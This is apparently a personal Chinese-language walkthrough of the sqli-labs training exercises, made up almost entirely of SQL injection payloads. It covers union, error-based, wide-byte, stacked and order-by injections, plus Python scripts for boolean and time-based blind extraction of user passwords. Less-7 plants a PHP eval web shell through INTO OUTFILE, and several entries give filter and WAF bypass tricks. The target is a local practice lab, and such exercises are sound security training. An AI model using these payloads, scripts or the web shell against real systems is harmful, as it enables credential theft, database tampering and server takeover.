之前的一些关于 sqli-labs 的练习

Less-1(单引号 union 注入)

1
2
3
4
5
?id=' union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=' union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=' union select 1,2,group_concat(password) from users--+

Less-2(无引号 union 注入)

1
2
3
4
5
?id=0 union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=0 union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=0 union select 1,2,group_concat(password) from users--+

Less-3(单引号括号 union 注入)

1
2
3
4
5
?id=') union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=') union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=') union select 1,2,group_concat(password) from users--+

Less-4(双引号 union 注入)

1
2
3
4
5
?id=") union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+

?id=") union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+

?id=") union select 1,2,group_concat(password) from users--+

Less-5(单引号双注入)

1
2
3
4
5
?id=1' union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1' union select 1,count(*),concat('~',(select password from users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-6(双引号双注入)

1
2
3
4
5
?id=1" union select 1,count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

?id=1" union select 1,count(*),concat('~',(select password from users limit 0,1), '~',floor(rand()*2)) as a from information_schema.tables group by a--+

Less-7(一句话木🐎)

1
2
3
4
5
6
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

?id=1')) union select 1,2,'<?php @eval($_POST["123"]); ?>' into outfile 'E:\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\test.php'--+

上菜刀

Less-8(单引号布尔盲注)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-8/"
length = 0

'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
global length
for i in range(2,11):
#payload = "' or length(database())=" + str(i) + "#"
#payload = "' or length((select table_name from information_schema.tables where table_schema=database() limit 4,1))=" + str(i) + "#"
#payload = "' or length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
payload = "' or length((select password from users limit 0,1))=" + str(i) + "#"
data = {
'id':payload
}
r = requests.get(url,params=data)
if "You are in" in r.text:
length = i
print("【+】 right length: " + str(i))
break
else:
pass
print("【*】 wrong length: " + str(i))

def getPayload():
password = ""
for i in range(1,length+1):
left = ord('a')
right = ord('z')
while left != right:
mid = int((left + right) / 2)
#payload = "' or ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
payload = "' or ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
data = {
'id':payload
}
r = requests.get(url,params=data)
if "You are in" in r.text:
left = mid + 1
print(str(i) + " > " + chr(mid))
else:
right = mid
print(str(i) + " <= " + chr(mid))
password += chr(left)
print("【+】 password: " + password)

if __name__ == "__main__":
getLength()
getPayload()

Less-9(单引号时间盲注)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-9/"
length = 0
letters = string.ascii_letters # lowercase

'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
global length
for i in range(2,11):
#payload = "' or if(length(database())=" + str(i) + ",sleep(4),1)#"
#payload = "' or if(length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + ",sleep(4),1)#"
#payload = "' or if(length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + ",sleep(4),1)#"
payload = "' or if(length((select password from users limit 0,1))=" + str(i) + ",sleep(4),1)#"
data = {
'id':payload
}
try:
r = requests.get(url,params=data,timeout=3)
print("【*】 present length: " + str(i))
except requests.exceptions.ReadTimeout as e:
length = i
print("【+】 right length: " + str(i))
break

def getPayload():
password = ""
for i in range(1,length+1):
'''
left = ord('a')
right = ord('z')
while left != right:
mid = int((left + right) / 2)
payload = "' or if(ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + ",1,sleep(4))#"
#payload = "' or ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 4,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "' or ASCII(mid((select password from users limit 1,1)," + str(i) + ",1))>" + str(mid) + "#"
data = {
'id':payload
}
try:
r = requests.get(url,params=data,timeout=3)
left = mid + 1
print(str(i) + " > " + chr(mid))
except requests.exceptions.ReadTimeout as e:
right = mid
print(str(i) + " <= " + chr(mid))

password += chr(left)
print("【+】 password: " + password)
'''
for j in letters:
#payload = "' or if(ASCII(mid(database()," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
#payload = "' or if(ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
#payload = "' or if(ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
payload = "' or if(ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))=" + str(ord(j)) + ",sleep(4),1)#"
data = {
'id':payload
}
try:
r = requests.get(url,params=data,timeout=3)
print("【*】 present password: " + str(i) + " = " + j)
except requests.exceptions.ReadTimeout as e:
password += j
print("【+】 password: " + password)
break

if __name__ == "__main__":
getLength()
getPayload()

Less-10(双引号时间盲注)

1
Less-9 单引号改双引号

Less-11(用户名加密的单引号 union 注入)

1
2
3
4
5
6
7
uname = admin'#

' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

' union select 1,group_concat(password) from users#

Less-12(用户名加密的双引号括号 union 注入)

1
2
3
uname = admin")#

less-11 单引号改双引号括号

Less-13(用户名的单引号括号双注入)

1
2
3
4
5
admin') union select count(*),concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

admin') union select count(*),concat('~',(select password from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a#

Less-14(用户名的双引号双注入)

1
less-13 单引号括号改双引号

Less-15(用户名的单引号布尔注入)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import requests
import string

url = "http://localhost:8088/sqli-labs-master/Less-15/"
length = 0

'''
盲注结果:

|- security
|- emails
|- referers
|- uagents
|- users
|- id
|- username
|- password
|- Dumb
|- ...
'''

def getLength():
global length
for i in range(2,11):
#payload = "admin' and length(database())=" + str(i) + "#"
#payload = "admin' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=" + str(i) + "#"
#payload = "admin' and length((select column_name from information_schema.columns where table_name='users' limit 2,1))=" + str(i) + "#"
payload = "admin' and length((select password from users limit 0,1))=" + str(i) + "#"
data = {
'uname':payload,
'passwd':123
}
r = requests.post(url,data=data)
if "flag.jpg" in r.text:
length = i
print("【+】 right length: " + str(i))
print("--------------------------------------------")
break
else:
print("【*】 wrong length: " + str(i))

def getPayload():
password = ""
for i in range(1,length+1):
left = ord('A')
right = ord('z')
while left != right:
mid = int((left + right) / 2)
#payload = "admin' and ASCII(mid(database()," + str(i) + ",1))>" + str(mid) + "#"
#payload = "admin' and ASCII(mid((select table_name from information_schema.tables where table_schema=database() limit 3,1)," + str(i) + ",1))>" + str(mid) + "#"
#payload = "admin' and ASCII(mid((select column_name from information_schema.columns where table_name='users' limit 2,1)," + str(i) + ",1))>" + str(mid) + "#"
payload = "admin' and ASCII(mid((select password from users limit 0,1)," + str(i) + ",1))>" + str(mid) + "#"
data = {
'uname':payload,
'passwd':123
}
r = requests.post(url,data=data)
if "flag.jpg" in r.text:
left = mid + 1
print(str(i) + " > " + chr(mid))
else:
right = mid
print(str(i) + " <= " + chr(mid))
password += chr(left)
print("【+】 password: " + password)

if __name__ == "__main__":
getLength()
getPayload()

Less-16(用户名的双引号括号布尔注入)

1

Less-17(用户名加密的单引号报错注入)

1

Less-18(User-Agent 报错注入)

1
User-Agent: ' or updatexml(1,concat('~',(select table_name from information_schema where table_schema=database),'~'),1) or

Less-19(Referer 报错注入)

1

Less-20(User-Agent 报错注入)

1
2
3
4
5
6
7
上 burpsuite 修改 Cookie:

Cookie: uname=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

Cookie: uname=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

Cookie: uname=' union select 1,2,group_concat(password) from users#

Less-21(User-Agent 加密报错注入)

1
less-20 单引号改单引号括号再用 base64 加密

Less-22(User-Agent 加密报错注入)

1
less-20 单引号改双引号再用 base64 加密

Less-23 (过滤注释)

1
2
3
4
5
?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' and '1

?id=' union select 1,2,group_concat(password) from users where ''='

Less-24 (二次排序漏洞)

1
先注册一个 admin'# 账号再修改 admin'# 的密码,新密码即为 admin 的密码。

Less-25 (过滤 or & and)

1
2
3
4
5
6
7
一次性关键词绕过 用 oorr 和 aandnd 绕过

?id=' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

?id=' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name='users'--+

?id=' union select 1,2,group_concat(passwoorrd) from users--+

Less-25a(过滤 or & and )

1
表面上是盲注,背地里是 less-25 无引号的 union 注入...

Less-26 (过滤空格和注释的报错注入)

1
2
3
4
5
6
7
8
9
本题全部空格都过滤了,所以采取报错注入
or 用 || 代替,and 用 %26%26 代替(&&也过滤了)
注释则用 ||'1 闭合

?id='||updatexml(1,concat('~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())%26%26(table_name='user')),'~'),1)||'1

?id='||updatexml(1,concat('~',(select(group_concat(passwoorrd))from(users)),'~'),1)||'1

Less-26a(过滤空格和注释的布尔注入)

1
空格全部被过滤,此题又不能进行报错注入,所以采取布尔注入

Less-27 (过滤 nion 和 select 的 union 注入)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
union 注入:
通过脚本可知空格可以用 %09、%0a-%0d 绕过
非一次性关键词绕过,union 和 select 用大小写 unioN 和 selecT 绕过

?id='%0AunioN%0AselecT%0A1,2,group_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema=database()%0Aand%0Atable_name='users'%0Aand%0A'1

?id='%0AunioN%0AselecT%0A1,2,group_concat(column_name)%0Afrom%0Ausers%0Awhere%0A'1
或者
?id='%0AunioN%0AselecT%0A1,(selecT%0Agroup_concat(password)%0Afrom%0Ausers),3%0A||'

报错注入:
其他与 less-26 类似

?id='||updatexml(1,concat('~',(selecT(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(column_name))from(information_schema.columns)where(table_schema=database())%26%26(table_name='users')),'~'),1)||'1

?id='||updatexml(1,concat('~',(selecT(group_concat(password))from(users)),'~'),1)||'1

Less-27a(过滤 nion 和 select 的时间盲注)

1
2
双引号 + 时间盲注
其他同 less-27

Less-28(过滤 nion 和 select 的 union 注入)

1
2
3
有个小bug,网上的 payload 都是 union 注入,但是我的空格不能用 %a0 绕过...所以只好用布尔盲注

?id=1')and(ascii(mid(database(),1,1))=115)and('1')=('1

Less-28a(过滤 union 和 select 的布尔注入)

1
同 less-28

Less-29(WAF1)

1
2
3
4
5
6
7
这题是???签到题???

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=' union select 1,group_concat(password),3 from users--+

Less-30(WAF2)

1
less-29 单引号改双引号

Less-31(WAF3)

1
less-29 单引号改双引号括号

Less-32(宽字节注入)

1
2
3
4
5
6
7
基于 get 方法的宽字节注入,加 %df 绕过

?id=%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=%df' union select 1,group_concat(password),3 from users--+

Less-33(宽字节注入)

1
同 less-32

Less-34(用户名和密码加反斜杠)

1
2
3
4
5
6
7
8
9
基于 post 的宽字节注入,又可以将 utf-8 转换为 utf-16 或 utf-32,例如将'转为 utf-16 为 %EF%BF%BD'/�'

万能密码 �' or 1# 不知道为什么我的电脑只有这个能用

admin=�' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

admin=�' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

admin=�' union select 1,group_concat(password) from users#

Less-35(加反斜杠没引号的 union 注入)

1
2
3
4
5
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=0 union select 1,group_concat(password),3 from users--+

Less-36(基于 get 的 mysql_real_escape_string() 函数的 union 注入)

1
同 less-32

Less-37(基于 post 的 mysql_real_escape_string() 函数的 union 注入)

1
同 less-34

Less-38(堆叠注入)

1
2
3
stacked injection:在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。所以我们可以利用分号进行多聚输入。

?id=1';insert into users(id,username,password) values(15,'less38','less38') -- +

Less-39(堆叠注入)

1
?id=1;insert into users(id,username,password) values(16,'less39','less39') -- +

Less-40(堆叠注入)

1
?id=1');insert into users(id,username,password) values(17,'less40','less40') -- +

Less-41(堆叠注入)

1
同 less-39 区别于无报错信息

Less-42(堆叠注入)

1
2
3
用户名做了转义处理,可以对密码进行堆叠注入

login_user=1&login_password=1';create table less42 like users#

Less-43(堆叠注入)

1
2
3
类似 less-42,只是多了个括号

login_user=1&login_password=1');create table less43 like users#

Less-44(堆叠注入)

1
同 less-42 只是没有报错信息

Less-45(堆叠注入)

1
同 less-43 只是没有报错信息

Less-46(order by 注入)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
此题可考虑报错注入和延时注入:
1. 直接添加注入语句,?sort=(select ******);
2. 利用一些函数。例如rand()函数等。?sort=rand(sql语句),对比rand(ture)和rand(false)的结果,可以判断是否注入成功;
3. 利用and,例如?sort=1 and (加sql语句)。

报错注入:

?sort=1 and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~'))--+

?sort=1 and extractvalue(1,concat('~',(select group_concat(password) from users),'~'))--+

延时注入例子 :

http://127.0.0.1/sqli-labs-master/Less-46/?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))

Less-47 (order by 注入)

1
类似 less-46 只是多了一个单引号

Less-48(order by 盲注)

1
2
3
4
类似 less-46 无报错信息,所以需要盲注
如:
?sort=1 and if(length(database())=8,sleep(4),1)--+
?sort=1 and if(ascii(left(database(),1))=115,sleep(4),1)--+

Less-49(order by 盲注)

1
类似 less-48 多了一个单引号

Less-50(order by 堆叠注入)

1
2
3
4
这题使用 mysqli_multi_query 函数,所以可以执行多个语句。

?sort=1;create table less50 like users -- +
/?sort=1;insert into users(id,username,password)value(18,'less50','less50')#

Less-51(order by 堆叠注入)

1
类似 less-50 多了一个单引号

Less-52(order by 堆叠注入)

1
同 less-50 没有了注释

Less-53(order by 堆叠注入)

1
同 less-51 没有了注释

Less-54(挑战1)

1
依旧是字符型注入,只不过只有十次机会,密码就在 secret 列名里面

Less-55(挑战2)

1
类似 less-54 加了一个括号

Less-56(挑战3)

1
类似 less-54 加了一个单引号括号

Less-57(挑战4)

1
类似 less-54 加了一个双引号

Less-58(挑战5)

1
union 注入失败,但是可以进行报错注入,这次是单引号型的

Less-59(挑战6)

1
类似 less-58 这次是纯数字型

Less-60(挑战7)

1
类似 less-58 这次是双引号括号型的

Less-61(挑战8)

1
类似 less-58 这次真的猜不出...原来是单引号加两层括号...

Less-62(挑战9)

1
2
单引号括号型,但是 union 注入和报错注入已经失效,页面信息也没有变化
所以只能进行时间盲注